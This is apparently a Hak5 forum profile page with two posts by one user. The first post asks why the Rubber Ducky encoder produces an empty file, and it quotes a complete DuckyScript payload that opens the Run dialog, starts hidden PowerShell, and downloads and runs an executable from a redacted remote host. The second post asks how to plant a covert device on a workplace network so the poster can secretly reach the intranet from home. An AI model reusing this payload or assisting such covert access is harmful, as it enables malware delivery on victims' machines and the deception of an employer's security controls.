Jump to content

myself021

Active Members
  • Posts

    9
  • Joined

  • Last visited

Posts posted by myself021

  1. Hi guys. i have a problem i don't understand what i am doing wronkg

    i have made a script and all time i encode all goes fine but have 0 kb inject.bin file

    I have try the duckencode.jar also and they give me a different error

    java -jar duckencode.jar -i /root/scriptduck -o /root/output.bin
    Error on Line: 1
    Error on Line: 2
    Error on Line: 3
    Error on Line: 4
    Error on Line: 5
    Error on Line: 6
    Error on Line: 7
    When i run the 2.6.3 version i get this

    java -jar encoder.jar -i /root/scriptduck -o /root/output.bin -l resources/br.properties

    Hak5 Duck Encoder 2.6.3
    Loading File ..... [ OK ]
    Loading Keyboard File ..... [ OK ]
    Loading Language File ..... [ OK ]
    Loading DuckyScript ..... [ OK ]
    DuckyScript Complete..... [ OK ]
    this is the script
    DELAY 4000
    GUI r
    DELAY 300
    STRING powershell -windowstyle hidden(new-object System.Net.WebClient).DownloadFile('http://xxxxxxxxxx.xxx/upload/xxxxxxxx.xxx,%TEMP%\xxxxxxxx.xxx');Start-Process "%TEMP%\xxxxxxx.exe"
    ENTER
    very easy but i don't know what is fail
    Im using linux kali for this
    some suggestions?
    i have lost all day try to fix this
    don't know what can be
    the strange is i have made a lot of times this script in a old linux virtual machine but i have deleted and create a new one and now i only get 0 kb .bin files
  2. Hi everyone . Im new here.

    Let em introduce ,my name is Alexandre , im from brazil

    I have been learning a lot about penetrating and hack mods here

    i have a test im tryng to made and im not pretty sure how to complete this

    The scenario is this.

    i need to be able to connect to my work network to work from home

    i work in a support 7/24 , some times i don't want to come to work because is just me alone in the front of the computer

    some times i spend all week whit no issue

    so i want to be able to open a intranet site in my house.

    how is the best way to accomplish this?

    Can i create a vpn between my house connection and turtle module? then in my browser be able to open a local intranet webpage?

    Maybe a raspberry pi whit some tools? i can provide my own credentials to the box , so i think will have same privileges as me.

    how this can be done?

    mitmproxy ?

    how can i act like im on work ??

    is this possible? is just a dream?

    sorry my english is not that good

    thanks in avance

×
×
  • Create New...